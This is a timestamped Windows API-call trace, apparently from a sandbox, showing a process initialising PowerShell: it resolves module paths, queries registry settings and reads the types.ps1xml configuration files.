	[0799.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.976] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0799.976] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0799.976] CoTaskMemFree (pv=0x2d4e20) 
	[0799.977] CoTaskMemAlloc (cb=0xcc) returned 0x1b8de220
	[0799.977] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8de220, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0799.977] CoTaskMemFree (pv=0x1b8de220) 
	[0799.977] CoTaskMemAlloc (cb=0xf0) returned 0x1b8d9e40
	[0799.978] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8d9e40, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0799.978] CoTaskMemFree (pv=0x1b8d9e40) 
	[0799.978] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd9e8 | out: phkResult=0x1cd9e8*=0x318) returned 0x0
	[0799.978] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd96c, lpData=0x0, lpcbData=0x1cd968*=0x0 | out: lpType=0x1cd96c*=0x2, lpData=0x0, lpcbData=0x1cd968*=0x6c) returned 0x0
	[0799.978] CoTaskMemAlloc (cb=0x70) returned 0x25f2a0
	[0799.978] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd93c, lpData=0x25f2a0, lpcbData=0x1cd938*=0x6c | out: lpType=0x1cd93c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1cd938*=0x6c) returned 0x0
	[0799.978] CoTaskMemFree (pv=0x25f2a0) 
	[0799.978] CoTaskMemAlloc (cb=0xcc) returned 0x1b8de220
	[0799.978] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b8de220, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0799.978] CoTaskMemFree (pv=0x1b8de220) 
	[0799.978] CoTaskMemAlloc (cb=0xcc) returned 0x1b8de220
	[0799.978] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8de220, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0799.978] CoTaskMemFree (pv=0x1b8de220) 
	[0799.982] RegCloseKey (hKey=0x318) returned 0x0
	[0799.982] CoTaskMemAlloc (cb=0xcc) returned 0x1b8de220
	[0799.982] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8de220, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0799.982] CoTaskMemFree (pv=0x1b8de220) 
	[0799.982] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd9e8 | out: phkResult=0x1cd9e8*=0x318) returned 0x0
	[0799.982] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd96c, lpData=0x0, lpcbData=0x1cd968*=0x0 | out: lpType=0x1cd96c*=0x0, lpData=0x0, lpcbData=0x1cd968*=0x0) returned 0x2
	[0799.983] RegCloseKey (hKey=0x318) returned 0x0
	[0799.988] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0799.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.988] CoTaskMemFree (pv=0x2d4e20) 
	[0799.990] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0799.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.990] CoTaskMemFree (pv=0x2d4e20) 
	[0799.996] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0799.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.996] CoTaskMemFree (pv=0x2d4e20) 
	[0799.996] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0799.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.996] CoTaskMemFree (pv=0x2d4e20) 
	[0799.998] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd7d8 | out: phkResult=0x1cd7d8*=0x318) returned 0x0
	[0799.998] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x1cd7ec, lpData=0x0, lpcbData=0x1cd7e8*=0x0 | out: lpType=0x1cd7ec*=0x1, lpData=0x0, lpcbData=0x1cd7e8*=0x74) returned 0x0
	[0799.998] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x1cd75c, lpData=0x0, lpcbData=0x1cd758*=0x0 | out: lpType=0x1cd75c*=0x1, lpData=0x0, lpcbData=0x1cd758*=0x74) returned 0x0
	[0799.999] CoTaskMemAlloc (cb=0x78) returned 0x25f2a0
	[0799.999] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x1cd72c, lpData=0x25f2a0, lpcbData=0x1cd728*=0x74 | out: lpType=0x1cd72c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd728*=0x74) returned 0x0
	[0799.999] CoTaskMemFree (pv=0x25f2a0) 
	[0799.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0799.999] SetErrorMode (uMode=0x1) returned 0x1
	[0799.999] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd6b0 | out: lpFileInformation=0x1cd6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0799.999] SetErrorMode (uMode=0x1) returned 0x1
	[0800.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0800.000] SetErrorMode (uMode=0x1) returned 0x1
	[0800.000] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd6b0 | out: lpFileInformation=0x1cd6b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0800.000] SetErrorMode (uMode=0x1) returned 0x1
	[0800.003] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0800.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.003] CoTaskMemFree (pv=0x2d4e20) 
	[0800.004] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0800.004] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.004] CoTaskMemFree (pv=0x2d4e20) 
	[0800.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0800.010] SetErrorMode (uMode=0x1) returned 0x1
	[0800.010] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0800.010] GetFileType (hFile=0x320) returned 0x1
	[0800.010] SetErrorMode (uMode=0x1) returned 0x1
	[0800.010] GetFileType (hFile=0x320) returned 0x1
	[0800.011] ReadFile (in: hFile=0x320, lpBuffer=0x2db0f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2db0f48*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.012] ReadFile (in: hFile=0x320, lpBuffer=0x2db0f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2db0f48*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.012] ReadFile (in: hFile=0x320, lpBuffer=0x2db0f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2db0f48*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.013] ReadFile (in: hFile=0x320, lpBuffer=0x2db0f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2db0f48*, lpNumberOfBytesRead=0x1cd5e8*=0xcf3, lpOverlapped=0x0) returned 1
	[0800.013] ReadFile (in: hFile=0x320, lpBuffer=0x2db03a3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2db03a3*, lpNumberOfBytesRead=0x1cd5e8*=0x0, lpOverlapped=0x0) returned 1
	[0800.013] ReadFile (in: hFile=0x320, lpBuffer=0x2db0f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2db0f48*, lpNumberOfBytesRead=0x1cd5e8*=0x0, lpOverlapped=0x0) returned 1
	[0800.015] CloseHandle (hObject=0x320) returned 1
	[0800.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0800.887] SetErrorMode (uMode=0x1) returned 0x1
	[0800.887] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd560 | out: lpFileInformation=0x1cd560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0800.887] SetErrorMode (uMode=0x1) returned 0x1
	[0800.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0800.889] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd648 | out: phkResult=0x1cd648*=0x320) returned 0x0
	[0800.889] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd5cc, lpData=0x0, lpcbData=0x1cd5c8*=0x0 | out: lpType=0x1cd5cc*=0x1, lpData=0x0, lpcbData=0x1cd5c8*=0x56) returned 0x0
	[0800.889] CoTaskMemAlloc (cb=0x5a) returned 0x2d9a70
	[0800.889] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd59c, lpData=0x2d9a70, lpcbData=0x1cd598*=0x56 | out: lpType=0x1cd59c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd598*=0x56) returned 0x0
	[0800.889] CoTaskMemFree (pv=0x2d9a70) 
	[0800.889] RegCloseKey (hKey=0x320) returned 0x0
	[0800.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0800.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0800.915] VirtualQuery (in: lpAddress=0x1cc330, lpBuffer=0x1cd1f0, dwLength=0x30 | out: lpBuffer=0x1cd1f0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0801.802] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0801.802] GetFileType (hFile=0x320) returned 0x1
	[0801.802] SetErrorMode (uMode=0x1) returned 0x1
	[0801.802] GetFileType (hFile=0x320) returned 0x1
	[0801.802] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.803] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.804] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.805] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.805] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.806] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.807] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.807] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.807] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.810] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.811] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.811] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.812] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.812] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.812] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.813] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0801.813] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.752] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.753] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.753] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.753] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.754] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.754] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.754] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.755] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.755] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.755] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
	[0802.756] ReadFile (in: hFile=0x320, lpBuffer=0x2e18108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd5e8, lpOverlapped=0x0 | out: lpBuffer=0x2e18108*, lpNumberOfBytesRead=0x1cd5e8*=0x1000, lpOverlapped=0x0) returned 1
